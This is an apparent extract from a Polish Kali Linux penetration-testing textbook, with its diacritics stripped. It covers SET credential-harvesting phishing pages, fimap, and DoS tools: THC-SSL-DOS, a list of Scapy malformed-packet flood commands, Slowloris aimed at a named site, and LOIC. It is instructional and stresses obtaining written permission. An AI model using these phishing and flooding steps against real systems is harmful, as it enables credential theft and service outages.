2 Teraz wybierz opcj 2) Website Attack Vectors 3 Wybierz opcj 3) Credential Harvester Attack Method

Do wyboru masz teraz kilka opcji okre laj cych sposoacuteb klonowania wybranej witryny PakietSET posiada swoje w asne wbudowane szablony dla popularnych witryn takich jak Facebookczy Gmail Czasami u ycie szablonu nie jest najlepszym rozwi zaniem aczkolwiek na pocz tekpowinno w zupe no ci wystarczy Je eli zamiast szablonu chcesz u y kopii wybranej witry-ny internetowej musisz poda jej adres URL mdash pakiet SET rozpocznie proces klonowania

Je eli posiadasz ju wykonan wcze niej kopi witryny lub samodzielnie utworzy e odpowiedniepliki HTML mo esz wybra opcj 3) Custom Import Po wybraniu tej opcji b dziesz moacutegwskaza lokalizacj plikoacutew HTML ktoacuterych chcesz u y

W naszym przyk adzie u yjemy gotowych szablonoacutew witryn internetowych Pakiet SET poprosio podanie adresu IP na ktoacuterym b dzie nas uchiwa nadchodz cych da mdash w tym przypadkub dzie to adres IP interfejsu sieciowego naszego systemu Kali Linux Wyj tkiem od tej regu ymo e by sytuacja kiedy wykorzystujesz us ug NAT zapory sieciowej W takim przypadkuzamiast lokalnego adresu IP systemu Kali Linux powiniene u y publicznego adresu IP hostaus ugi NAT tak aby klienty z zewn trz mog y czy si z Twoim systemem W naszym przy-k adzie u yjemy adresu IP interfejsu p tli zwrotnej 127001

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

252

Kiedy zdefiniujesz adres IP pakiet SET poprosi Ci o wybranie szablonu W naszym przy-padku wybierzemy opcj Facebook

Na kolejnym rysunku przedstawiono okno przegl darki po czonej z serwerem o adresie127001 i wy wietlaj cej nasz fa szyw stron portalu Facebook Je eli wy wietlona stronanie wygl da przekonuj co mo esz u y innego szablonu albo po prostu sklonowa aktualnwersj danej strony

Zwroacute uwag e w pasku adresu przegl darki wy wietlany jest adres 127001 W wi kszo ciprzypadkoacutew b dziesz musia jednak u y nieco bardziej wyrafinowanych wektoroacutew atakuaby przekona u ytkownikoacutew do odwiedzenia Twojej spreparowanej strony internetowejMo esz to zrobi na wiele sposoboacutew na przyk ad poprzez rozsy anie do u ytkownikoacutew pocztelektroniczn specjalnie przygotowanej wiadomo ci zawieraj cej cze do Twojej spreparowanejwitryny internetowej (zobacz pierwszy rysunek na nast pnej stronie)

Kiedy u ytkownik rozpocznie wpisywanie nazwy konta i has a dost pu na naszej fa szywejstronie udaj cej witryn Facebook pakiet SET przechwyci ca y zwi zany z tym ruch sieciowyi nast pnie przekieruje u ytkownika do prawdziwej witryny internetowej Istnieje bardzo du-a szansa na to e po takim przekierowaniu u ytkownik b dzie przekonany e po prostu po-

myli si podczas wpisywania has a i zaloguje si jeszcze raz nie maj c wiadomo ci e bdquopodrodzerdquo pakiet SET przechwyci nazw jego konta i has o dost pu (zobacz drugi rysunek nanast pnej stronie)

Jak wida na powy szym rysunku pakiet SET przechwyci nazw naszego konta u ytkownikaDrChaos i nasze has o dost pu ILoveKali

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

253

Po zako czeniu tego wiczenia u yj kombinacji klawiszy Ctrl+C aby zako czy prac programuSET i wygenerowa raport w formacie HTML SET generuje profesjonalnie wygl daj cy ra-port ktoacuterego mo esz z powodzeniem u y podczas tworzenia raportu ko cowego z przepro-wadzonego testu penetracyjnego

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

254

Fimap

Fimap to narz dzie napisane w j zyku Python przeznaczone do wyszukiwania i wykorzysty-wania podatno ci i luk w zabezpieczeniach aplikacji internetowych pozwalaj cych na przeprowa-dzanie atakoacutew typu LFI (ang Local File Inclusion) lub RFI (ang Remote File Inclusion)

Aby uruchomi pakiet Fimap w systemie Kali Linux przejd do grupy Kali Linux a nast pniewybierz polecenie Web ApplicationsWeb Vulnerability Scannersfimap Po wybraniu tegopolecenia na ekranie pojawi si nowe okno terminala z wy wietlonym ekranem powitalnympolecenia fimap Dla pakietu fimap istnieje roacutewnie kilka dodatkowych wtyczek ktoacutere mo eszpobra z internetu i zainstalowa za pomoc nast puj cego polecenia

fimap --install -plugins

Dost pne wtyczki zostan wy wietlone w formie listy z opcj pozwalaj c na zainstalowaniewybranej wtyczki lub zako czenie dzia ania polecenia Jak wida w naszym przyk adzie do-st pne s dwie dodatkowe wtyczki st d polecenie instalowania musimy wykona dwukrotnieindywidualnie instaluj c poszczegoacutelne wtyczki (zobacz pierwszy rysunek na nast pnej stronie)

Aby u y pakietu Fimap musisz najpierw poda adres URL witryny ktoacutera b dzie celem skaneraIstnieje wiele metod definiowania adresoacutew URL Mo esz na przyk ad poda jeden wybrany adresURL ca list adresoacutew URL mo esz u y wyszukiwarki Google do zebrania adresoacutew URL

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

255

ale roacutewnie dobrze mo esz u y innych metod takich jak zbieranie wszystkich adresoacutew URLz hiper czy zamieszczonych na danej stronie internetowej czy pozyskiwanie adresoacutew URL z for-mularzy i nag oacutewkoacutew stron W naszym przypadku celem skanera b dzie witryna httpwwwthesecuritybloggercom

Aby uruchomi skanowanie witryny httpwwwthesecuritybloggercom powiniene wpisanast puj ce polecenie

fimap -u httpwwwthesecuritybloggercom

Pakiet Fimap rozpocznie skanowanie i sproacutebuje automatycznie wykry podatno ci na atakitypu LFIRFI Na rysunku przedstawionym poni ej wida jednak e witryna wwwthesecurity

bloggercom jest odporna na tego typu ataki

Ataki typu DoSW zdecydowanej wi kszo ci przypadkoacutew celem przeprowadzania testoacutew penetracyjnych jestidentyfikacja potencjalnych i rzeczywistych podatno ci i luk w zabezpieczeniach bez umy l-nego zak oacutecania dzia ania atakowanego systemu i bez robienia mu krzywdy w jakikolwiek in-ny sposoacuteb Jest to kluczowy element odroacute niaj cy autoryzowanego pentestera od z o liwegonapastnika maj cego niecne zamiary Prawdziwy napastnik nie przestrzega adnych regu

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

256

i nie zwraca uwagi na to czy jego dzia ania spowoduj zak oacutecenia w funkcjonowaniu atako-wanego systemu je eli tylko takie post powanie b dzie dla niego korzystne Czasami zdarzasi nawet e napastnik b dzie wr cz za wszelk cen szuka mo liwo ci zak oacutecenia dzia aniaczy nawet ca kowitego wy czenia atakowanego systemu Z tego powodu w niektoacuterych przypad-kach przeprowadzenie testoacutew odporno ci danej witryny czy aplikacji internetowej na ataki typuDoS (ang Denial of Service) mo e by bardzo po dane Testy tego rodzaju cz sto s nazywanetestami warunkoacutew skrajnych lub testami odporno ci na przeci enie systemu (ang stress testing)

Jedn z najwa niejszych spraw zwi zanych z testami odporno ci na ataki typu DoS jest bezwzgl dne uzyska-nie pisemnej zgody w a ciciela systemu na przeprowadzanie takich atakoacutew Niektoacutere metody atakoacutewmog mie negatywny wp yw na funkcjonowanie systemu nawet po zako czeniu testoacutew Dobrym roz-wi zaniem jest przeprowadzanie takich testoacutew na systemach z redundancj systemach nieprodukcyj-nych czy systemach zainstalowanych w rodowisku laboratoryjnym o ile to oczywi cie mo liwe

Najcz ciej spotykana metoda ataku DoS polega na bdquozalewaniurdquo badanego systemu masowonap ywaj cymi z zewn trz daniami Takie przeci enie zazwyczaj skutecznie uniemo liwiasystemowi odpowiadanie na rzeczywiste dania od autoryzowanych klientoacutew lub co najmniejtak spowalnia wysy anie odpowiedzi e ca y system staje si dla klientoacutew praktycznie bezu-yteczny Ataki typu DoS mog by skierowane na zasoby systemu (np przypisana przestrze

dyskowa przepustowo po cze sieciowych itd) konfiguracj systemu (np usuwanie tablicroutingu) informacje o stanie systemu (np resetowanie sesji TCP) oraz ka dy inny elementrodowiska systemu ktoacuterego przeci enie mo e spowodowa zak oacutecenie jego normalnego

funkcjonowania

Roacute nica pomi dzy atakami DoS (ang Denial of Service) a DDoS (ang Distributed Denial of Service) polega natym e do przeprowadzania ataku DoS napastnik wykorzystuje tylko jeden komputer podczas gdy w przy-padku atakoacutew DDoS liczba maszyn bior cych udzia w ataku mo e si ga tysi cy Omawianie zagadniezwi zanych z atakami DDoS wykracza niestety daleko poza ramy naszej ksi ki

Istniej cztery g oacutewne kategorie atakoacutew DoSDDoS Ataki wykorzystuj ce przeci enie po cze sieciowych (ang Volume Based

Attacks) mdash taki rodzaj ataku jest zwi zany z bdquozalewaniemrdquo atakowanego systemumasowo nap ywaj cymi pakietami UDP ICMP i innymi Celem takiego ataku jestprzeci enie po cze sieciowych atakowanego systemu nadmiernymi ilo ciamiprzesy anych pakietoacutew

Ataki na protoko y komunikacyjne (ang Protocol Attacks) mdash ataki te maj na celunadmierne wykorzystywanie zasoboacutew urz dze sieciowych takich jak routeryzapory sieciowe urz dzenia roacutewnowa ce obci enie po cze sieciowychPrzyk adami atakoacutew na protoko y komunikacyjne s ataki typu SYN floodPing of Death Smurf Teardrop wymuszanie fragmentacji pakietoacutew itp

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

257

Ataki na warstw aplikacji (ang Application Layer Attacks) mdash takie ataki wykorzystujnormalny ruch sieciowy do zak oacutecenia dzia ania lub nawet spowodowania awariidanej witryny lub aplikacji internetowej Przyk adami mog by ataki typu Zero-Dayczy ataki wykorzystuj ce inne podatno ci i luki w zabezpieczeniach witryn i aplikacjiinternetowych

Ataki powoduj ce wyczerpanie zasoboacutew sesji (ang Session Exhaustion) mdash takieataki powoduj wyczerpanie liczby dozwolonych jednocze nie sesji poprzez ci g enawi zywanie nowych po cze bez zamykania starych sesji co prowadzido wyczerpania zasoboacutew systemu

W systemie Kali Linux znajdziesz wiele narz dzi pozwalaj cych na wykorzystywanie podat-no ci i luk w zabezpieczeniach Narz dzia te na przyk ad Metasploit mog by u ywane doprzeprowadzania atakoacutew DoS na warstw aplikacji (wiele z tych narz dzi omawiali my ju wewcze niejszych rozdzia ach) W rozdziale 3 prezentowali my popularne narz dzie Scapypozwalaj ce na przeprowadzanie atakoacutew DoS na protoko y komunikacyjne Poni ej znaj-dziesz omoacutewienie kilku kolejnych narz dzi s u cych do przeprowadzania atakoacutew DoS ktoacuteremo esz znale w systemie Kali Linux

Aby przetestowa skuteczno ataku DoS mo esz u y witryny httpwwwupordownorg ktoacutera sprawdzadost pno podanej witryny internetowej

THX-SSL-DOSProtokoacute SSL (ang Secure Socket Layer) jest u ywany do nawi zywania bezpiecznych po -cze i transakcji w internecie Nawi zanie bezpiecznego po czenia z wykorzystaniem proto-ko u SSL wymaga u ycia po stronie serwera 15 razy wi kszej mocy obliczeniowej ni po stro-nie klienta Atak typu THC-SSL-DOS wykorzystuje t dysproporcj przez proacuteb prze adowaniaserwera spreparowanymi daniami nawi zania sesji SSL a do momentu kiedy przeci onyserwer si poddaje i przestaje odpowiada na dania przesy ane od innych autoryzowanychklientoacutew Atak wykorzystuje mechanizm renegocjacji bezpiecznego po czenia SSL do gene-rowania tysi cy takich da dla pojedynczego po czenia TCP Z tego powodu atak ten jestroacutewnie znany jako atak typu SSL-Exhaustion (ang mdash bdquowyczerpanie zasoboacutew SSLrdquo) Zalettakiego podej cia jest to e mo liwo ci przetwarzania da nawi zania sesji SSL s znaczniewy sze po stronie klienta co oznacza e przeci tny laptop pod czony do sieci za po red-nictwem cza o przeci tnej szybko ci mo e rzuci powa ne wyzwanie niemal ka demu serwero-wi aplikacji internetowych Podatno serweroacutew internetowych na ataki typu SSL-Exhaustionjest powszechnie znana a mimo to nie uda o si jeszcze opracowa skutecznej metody zapo-biegania takim atakom

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

258

Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca

thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept

W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej

Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

259

ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych

Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece

W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia

send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)

Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

260

Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy

Nieprawid owa wersja protoko u IP

send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)

Nieprawid owa suma kontrolna pakietu TCP

send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)

send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)

send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)

Ustawiona tylko flaga FIN

send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)

Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2

send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka pakietu

send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)

ICMP Flood

send(IP(dst=10001)ICMP()iface=eth0count=2000)

Nieprawid owa suma kontrolna pakietu IP

send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)

Fragmentacja pakietoacutew IP

send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

261

roacuted owy adres IP taki sam jak docelowy adres IP

send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)

Brak pakietu warstwy L4

send(IP(dst=10001 src=10203040) iface=eth0 count=2000)

Jednocze nie ustawione flagi SYN i FIN

send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)

Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)

Slowloris

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

262

Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym

programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco

czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera

Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne

Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris

Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej

perl slowlorispl

W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)

perl slowlorispl -dns thesecuritybloggercom

Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)

Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)

Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

263

LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

264

narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki

Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa

Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej

apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs

Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej

mkdir loic

Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej

wget httpsrawgithubcomnicolargoloicinstaller masterloicsh

Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie

chmod 777 loicsh

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

265

Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej

loicsh install

Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie

loicsh update

Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie

loicsh run

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

266

U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny

Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP

Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding

Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane

DNSChef

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

267

Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne

Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera

SniffJoke

SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

268

SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force

Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)

Sk adnia wywo ania polecenia siege jest nast puj ca

siege [opcje] ltadres URL celugt

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

269

Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-

nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku

InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

270

wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS

TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych

Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci

